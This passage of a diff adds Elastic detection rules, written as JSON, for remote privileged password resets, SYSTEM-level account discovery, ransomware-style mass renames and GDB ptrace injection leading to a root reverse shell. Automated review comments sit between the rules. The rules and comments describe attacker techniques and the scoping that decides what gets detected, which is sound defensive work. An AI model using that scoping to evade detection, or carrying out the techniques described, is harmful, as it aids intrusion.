[ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450_109", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_111.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_111.json new file mode 100644 index 00000000000..001be6c13d1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_111.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", + "false_positives": [ + "Legitimate remote account administration." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Password Reset Remotely", + "note": "This rule may cause medium to high performance impact due to logic scoping all remote Windows logon activity.", + "query": "sequence by winlog.computer_name with maxspan=1m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not winlog.event_data.TargetUserName : (\"svc*\", \"PIM_*\", \"_*_\", \"*-*-*\", \"*$\")] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : (\"S-1-5-21-*-500\", \"S-1-12-1-*-500\")\n )\n ] by winlog.event_data.SubjectLogonId\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", + "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx", + 
"https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "type": "eql", + "version": 111 + }, + "id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450_111", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_113.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_113.json new file mode 100644 index 00000000000..6b5b8da5b15 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_113.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", + "false_positives": [ + "Legitimate remote account administration." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Password Reset Remotely", + "note": "This rule may cause medium to high performance impact due to logic scoping all remote Windows logon activity.", + "query": "sequence by winlog.computer_name with maxspan=1m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not winlog.event_data.TargetUserName : (\"svc*\", \"PIM_*\", \"_*_\", \"*-*-*\", \"*$\")] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : (\"S-1-5-21-*-500\", \"S-1-12-1-*-500\")\n )\n ] by winlog.event_data.SubjectLogonId\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", + "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx", + 
"https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "type": "eql", + "version": 113 + }, + "id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450_113", + "type": "security-rule" +} \ No newline at end of file 
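Review bot: The sequence in `query` joins a 4624 logon to a 4724 password reset within `maxspan=1m` over forwarded indices (`logs-windows.forwarded*`), yet the rule sets no `timestamp_override`, unlike 2856446a-…_110 and 28d39238-…_5 in this same change, which carry `"timestamp_override": "event.ingested"`; with `"from": "now-9m"`, events whose forwarding delay exceeds the look-back could be missed. The same omission is in the 28738f9f-…_8 and 28bc620d-…_2 hunks. Consider adding `"timestamp_override": "event.ingested",` beside `"type": "eql"` where ingest lag is expected, or one `note` sentence explaining why it is left out. Separately, `required_fields` declares `winlog.logon.type` and `winlog.event_data.TargetSid` as `"type": "unknown"` although the query matches both as strings; declaring the mapped type would keep that metadata usable.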
diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_110.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_110.json new file mode 100644 index 00000000000..3b8b46eaba4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_110.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Discovery Command via SYSTEM Account", + "note": "## Triage and analysis\n\n### Investigating Account Discovery Command via SYSTEM Account\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed after attackers successfully perform privilege escalation or exploit web applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike, investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential webshell backdoor.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system shell using Windows services, scheduled tasks or other third party utilities.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n process.name : \"whoami.exe\" or\n (\n process.name : \"net1.exe\" and not process.parent.name : \"net.exe\" and not process.args : (\"start\", \"stop\", \"/active:*\")\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed_110", + "type": "security-rule" +} \ No newline at end of file 
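Review bot: In `required_fields`, `process.Ext.token.integrity_level_name` is declared `"type": "unknown"` while `winlog.event_data.IntegrityLevel`, matched against the same literal `"System"` in `query`, is `"keyword"`; the 2856446a-…_111 hunk repeats the inconsistency. If the endpoint field is keyword-mapped, change the entry to `"type": "keyword"`; otherwise a short sentence in `setup` on why the type is undetermined would help whoever maintains this metadata.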
diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_111.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_111.json new file mode 100644 index 00000000000..e67a9bf7954 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_111.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Discovery Command via SYSTEM Account", + "note": "## Triage and analysis\n\n### Investigating Account Discovery Command via SYSTEM Account\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed after attackers successfully perform privilege escalation or exploit web applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike, investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential webshell backdoor.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system shell using Windows services, scheduled tasks or other third party utilities.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n process.name : \"whoami.exe\" or\n (\n process.name : \"net1.exe\" and not process.parent.name : \"net.exe\" and not process.args : (\"start\", \"stop\", \"/active:*\")\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed_111", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_8.json b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_8.json new file mode 100644 index 00000000000..b35dc24e64e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/28738f9f-7427-4d23-bc69-756708b5f624_8.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Changes Activity Detected", + "query": "sequence by process.entity_id, host.id with maxspan=1s\n [file where host.os.type == \"linux\" and event.type == \"change\" and event.action == \"rename\" and file.extension : \"?*\" \n and process.executable : (\"./*\", \"/tmp/*\", \"/var/tmp/*\", \"/dev/shm/*\", \"/var/run/*\", \"/boot/*\", \"/srv/*\", \"/run/*\") and\n file.path : (\n \"/home/*/Downloads/*\", \"/home/*/Documents/*\", \"/root/*\", \"/bin/*\", \"/usr/bin/*\", \"/var/log/*\", \"/var/lib/log/*\",\n \"/var/backup/*\", \"/var/www/*\"\n ) and\n not process.name : (\n \"dpkg\", \"yum\", \"dnf\", \"rpm\", \"dockerd\", \"go\", \"java\", \"pip*\", \"python*\", \"node\", \"containerd\", \"php\", \"p4d\",\n \"conda\", \"chrome\", \"imap\", \"cmake\", \"firefox\", \"semanage\", \"semodule\", \"ansible-galaxy\", \"fc-cache\", \"jammy\", \"git\",\n \"systemsettings\", \"vmis-launcher\", \"bundle\", \"kudu-tserver\", \"suldownloader\"\n )\n ] with runs=25\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "28738f9f-7427-4d23-bc69-756708b5f624", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "type": "eql", + "version": 8 + }, + "id": "28738f9f-7427-4d23-bc69-756708b5f624_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/28bc620d-b2f7-4132-b372-f77953881d05_2.json b/packages/security_detection_engine/kibana/security_rule/28bc620d-b2f7-4132-b372-f77953881d05_2.json new file mode 100644 index 00000000000..20e07ed65d5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/28bc620d-b2f7-4132-b372-f77953881d05_2.json 
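Review bot: `description` says the rule fires on "a sequence of 100 file extension rename events" within 1 second, but `query` ends with `with runs=25` (under `maxspan=1s`), so the text overstates the threshold fourfold. Either reword the description to `"sequence of 25 file extension rename events"` or, if 100 is the intended sensitivity, set `] with runs=100`. Because the false-positive rate of this rule scales with that threshold, a mismatch misleads anyone tuning it from the description alone.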
@@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where GDB (granted the CAP_SYS_PTRACE capability) is executed, after which an outbound network connection is initiated by UID/GID 0 (root). In Linux, the CAP_SYS_PTRACE capability grants a process the ability to use the ptrace system call, which is typically used for debugging and allows the process to trace and control other processes. Attackers may leverage this capability to hook and inject into a process that is running with root permissions in order to execute shell code and gain a reverse shell with root privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Root Network Connection via GDB CAP_SYS_PTRACE", + "query": "sequence by host.id, process.entry_leader.entity_id with maxspan=30s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"gdb\" and\n (process.thread.capabilities.effective : \"CAP_SYS_PTRACE\" or process.thread.capabilities.permitted : \"CAP_SYS_PTRACE\") and\n user.id != \"0\"]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and\n process.name != null and user.id == \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entry_leader.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "28bc620d-b2f7-4132-b372-f77953881d05", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.008", + "name": "Ptrace System Calls", + "reference": "https://attack.mitre.org/techniques/T1055/008/" + } + ] + }, + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + 
